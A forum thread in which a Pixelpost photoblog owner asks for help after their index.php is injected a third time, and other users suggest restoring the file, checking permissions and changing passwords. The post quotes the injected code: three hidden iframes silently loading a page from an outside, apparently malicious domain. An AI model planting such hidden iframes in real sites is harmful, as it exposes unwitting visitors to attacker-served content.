Site injected yet again...

[dgoering]

Ok, this is the third time that this has happened.
Somehow someone (or a bot I don't know) has injected my index.php with code.
My index.php is empty except for

PHP Code:

<iframe src="http://buillding.net/session/index.php" style="display:none"></iframe><iframe src="http://buillding.net/session/index.php" style="display:none"></iframe><iframe src="http://buillding.net/session/index.php" style="display:none"></iframe> 


I have contacted my provider and they say that they couldn't find anything suspicious in the logs, and it must be a security flaw in the script I am using.

Anyhow my question is how I can easily restore the index.php? As far as I can tell, the rest is still working. When I open the administration area that works fine and all my images are still there.
Any ideas how to get the site back up and running, or any thoughts at all on my problem are greatly appreciated.

[jaywilliams+]

You can re-download pixelpost, and replace the index.php file from the zip file.

Also, I'd suggest making sure your file permissions are set correctly, and to be even more safe, I'd suggest changing your password.

[dgoering]

Ok I will try and change the index.php to the original and see if that works... the permissions are set to 644 which should be ok, and I already changed my password.
It would still be nice to know if its a security hole in the script or in my Server settings or even my providers....

[Dkozikowski+]

What version of Pixelpost were you using when the injection occurred?